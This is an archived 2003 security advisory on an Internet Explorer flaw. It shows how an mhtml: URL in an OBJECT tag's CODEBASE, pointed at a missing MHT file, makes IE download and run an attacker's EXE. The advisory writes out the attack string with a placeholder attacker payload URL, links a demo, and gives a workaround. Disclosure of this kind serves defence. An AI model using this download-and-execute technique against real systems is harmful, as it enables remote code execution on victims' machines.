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MHTML Redirection Leads to Downloading EXE and Executing

daemon@ATHENA.MIT.EDU (Liu Die Yu)
Tue Nov 25 17:58:13 2003

Date: 25 Nov 2003 09:51:13 -0000
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From: Liu Die Yu <liudieyuinchina@yahoo.com.cn>
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MHTML Redirection Leads to Downloading EXE and Executing

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
A vulnerability in Internet Explorer is found: any attacker that can reach MYCOMPUTER security zone(a.k.a local zone) is able to download his EXE file and execute it.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Demo.zip

[technical details]
There is a feature in Internet Explorer when it tries to retrieve a file embedded in an MHT file, like:
mhtml:[Mhtml_File_Url]![Original_Resource_Url]
If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE will try to download [Original_Resource_Url] and return the downloaded content.

It's like as HTTP redirection.

And CODEBASE execution is a URL-based security check.
(Liu Die Yu's http://continue.to/trie )

So, in MYCOMPUTER security, point CODEBASE property of an OBJECT tag with unused CLSID to:
mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]
and then, IE will download [Attaker_PayloadEXE_Url] and execute it.

[Workaround]
Disable Active Scripting in INTERNET zone.

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Drew Copley, dror, guninski and mkill.

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